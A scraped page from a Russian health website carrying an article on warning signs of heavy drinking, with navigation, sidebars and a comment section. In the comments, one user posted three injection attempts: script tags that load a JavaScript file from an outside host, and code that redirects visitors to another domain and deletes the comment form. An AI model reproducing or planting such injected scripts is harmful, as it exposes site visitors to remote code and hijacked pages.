Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Как понять, что вы пьете ...  >>  Как понять, что вы пьете слишком много? Или уже спиваетесь?
 
Обратная связь
 

Как понять, что вы пьете слишком много? Или уже спиваетесь?

Размер шрифта
18 мая 2015 00:00
Юрий Малышев
Здоровье инфо
Александр Чистяков
Здоровье инфо
  • google_analytics: false
  • Нравится

Вы редко когда отказываетесь от бокала вина за обедом, не говоря уже о том, чтобы заказать второй (или третий) коктейль по скидке в счастливый час, но это вовсе не говорит о том, что вы много пьете, так ведь? Возможно, вы и правы, однако вполне вероятно, что вы уже находитесь в «опасной зоне» употребления алкоголя, хоть и не подозреваете об этом.

Как понять, что вы пьете слишком много? Или уже спиваетесь?

Согласно данным статистики, более 38 миллионов взрослых американцев сильно напиваются в среднем четыре раза за месяц. Чаще всего это люди в возрасте от 18 до 34 лет, но и люди старше 65 часто перебарщивают с выпивкой.

Так что же значит термин сильное опьянение в пересчете на количество спиртного? Для женщин это четыре или более алкогольных напитков, выпитых за короткий промежуток времени, а для мужчин – пять и более. Большинство из тех, кто напивается время от времени, не являются алкоголиками, однако это не значит, что они в безопасности. Между непьющим человеком и алкоголиком существуют промежуточные варианты, к которым принадлежат многие из нас. Чтобы определить, есть ли у вас проблемы с алкоголем, прочитайте представленные ниже критерии и спросите себя, подходите ли вы под какие-нибудь из них?

Вы становитесь очень смелым, когда выпиваете

Каждый, кто когда-либо видел своего обычно такого скромного коллегу танцующим на барной стойке во время вечеринки, знает о том, что алкоголь снимает многие внутренние запреты. Поведение в состоянии опьянения может привести к гораздо более неприятным последствиям, нежели просто чувство стыда и неловкости: оно может привести к рискованным решениям. По статистике, алкоголь связан примерно с 60% всех серьезных ожогов и утоплений, с 40% падений и аварий с летальным исходом, а также с половиной всех случаев сексуальных нападений.

Вы даете себе волю на выходных

Если вы не пьете каждый день, однако делаете это регулярно, например, каждый вечер пятницы – это уже довольно неприятный сигнал. Употребление алкоголя в небольших количествах в течение недели может снизить риск диабета и сердечно-сосудистых заболеваний, однако если вы воздерживаетесь всю неделю, а потом выпиваете 5-6 напитков за один вечер, вы нивелируете все возможные полезные свойства алкоголя.

Вы напиваетесь «неожиданно» для самого себя

Вы когда-нибудь говорили себе, что выпьете всего 1-2 коктейля, но незаметно для себя выпивали уже четыре или пять? Один из признаков того, что вы пьете слишком много – незнание, когда стоит остановиться. Как и многие проблемы со здоровьем, проблемы с выпивкой развиваются постепенно. Поэтому очень важно пересмотреть свои привычки и контролировать, сколько вы пьете и когда. Так вам будет проще вовремя остановиться, если все начнет выходить из-под контроля.

У вас появились провалы в памяти

Ученые считают, что алкоголь влияет на нашу память, нарушая работу глутамата – вещества в мозге, отвечающего за запоминание. Так что если вы не можете вспомнить и половины вчерашней вечеринки, не помните, как вернулись домой и добрались до кровати, вы точно выпили лишнего.

Вы пренебрегаете своими обязанностями

«Алкоголь становится проблемой, если вы замечаете, что пренебрегаете вещами, которые всегда были для вас очень важны, ради выпивки», – считает Кейт Хамфриз из Стенфордского Университета. Например, вы очень заботливый родитель, но после очередной вечеринки забываете уложить детей спать. Или из-за похмелья пропускаете важные занятия в понедельник утром. Если алкоголь нарушает ваш привычный уклад жизни и меняет приоритеты, вам стоит серьезно задуматься.

Близкие беспокоятся о вас

Если ваши родственники, друзья или коллеги намекнули вам или прямо сказали, что они за вас волнуются, самое время вам пересмотреть свои привычки. «Если вы боитесь спросить у своих близких, не пьете ли вы слишком много, это сигнал к тому, что вы действительно перебарщиваете с выпивкой», – добавляет доктор Хамфриз.

Если в вышесказанном вы узнали себя, то у вас определенно есть повод задуматься. Признание проблемы – это первый шаг к ее решению, поэтому если вы сами видите, что пьете слишком много, вам будет проще справиться с этой пагубной привычкой.

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - genafirst12

27 мая 2015 в 16:54

Комментарий удален за нарушение Правил общения

2 - genafirst12

27 мая 2015 в 16:54

Комментарий удален за нарушение Правил общения

3 - zzzzzz

30 июня 2015 в 18:21

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

4 - zzzzzz

30 июня 2015 в 21:19

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

5 - zzzzzz

30 июня 2015 в 22:10

Цитировать   |   Пожаловаться

-->> window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Чья печень в опасности: алкотипы. Часть 5   Для кого алкоголь опасней всего   Что нельзя есть с больной печенью   Чья печень в опасности: алкотипы. Часть 3  
22 июня 2013Грецкие орехи спасут от инфаркта 18 июня 2013Повезло, живете в пешей доступности от шоссе? Не так быстро! Чем ближе к шоссе, тем больнее почки! Как защитить себя?
 
12 июня 2013Обычный шум может вызвать остановку сердца! Как избежать этого? 04 июня 2013У вас лысый муж? Он может умереть от инфаркта
 

Слайдшоу

1
Как понять, что вы пьете много?
6 признаков, что ваш супруг алкоголик
Что алкоголь делает с печенью

Тесты

1
Будет ли у вас инфаркт?
Кофеин вызывает зависимость?
Грозит ли вам инфаркт миокарда?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.